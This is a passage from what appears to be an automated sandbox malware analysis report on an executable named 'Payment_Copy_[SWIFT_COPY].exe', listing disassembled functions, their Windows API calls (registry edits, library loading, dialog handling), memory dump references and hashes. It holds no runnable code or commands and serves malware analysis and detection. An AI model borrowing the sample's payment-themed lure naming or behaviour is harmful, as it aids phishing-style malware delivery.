                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$1033$pkfcbfzkpkrqtkjcmcyn Setup
                                                                                                                        • API String ID: 530164218-2178668135
                                                                                                                        • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                                                        • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                                                                                        • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                                                        • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402A69 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1912718029-0
                                                                                                                        • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                                                        • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                                                                                        • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                                                        • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                                                        • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                                                                                        • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                                                        • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404678 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                                                        • wsprintfA.USER32 ref: 0040471E
                                                                                                                        • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                                                        • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                                                                                        • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                                                        • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                                                        • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                                                                                        • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                                                        • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004056BA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-4083868402
                                                                                                                        • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                        • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                                                                                        • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                        • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401F84 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2987980305-0
                                                                                                                        • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                                                        • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                                                                                        • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                                                        • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402336 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                        • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356686001-0
                                                                                                                        • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                                                        • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                                                                                        • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                                                        • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040574E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405761
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405770
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3213498283-3404278061
                                                                                                                        • Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                                                                                                        • Instruction ID: 0cb000f169cdbbf2d5b9b6229b91127b5992dce5cf428481544f57f275cdbada
                                                                                                                        • Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                                                                                                        • Instruction Fuzzy Hash: 3FF0A762904A25D6EB3322A85C44F6B57ACDB55725F140477E100BB1D192BC4C82AFEA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401D38 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401D3F
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                        • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3272661963-0
                                                                                                                        • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                                                        • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                                                                                        • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                                                        • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402BF1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102729457-0
                                                                                                                        • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                                                        • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                                                        • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                                                        • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404E03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E39
                                                                                                                        • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                                                                                                                          • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                                                        • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                                                        • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                                                        • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403585 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
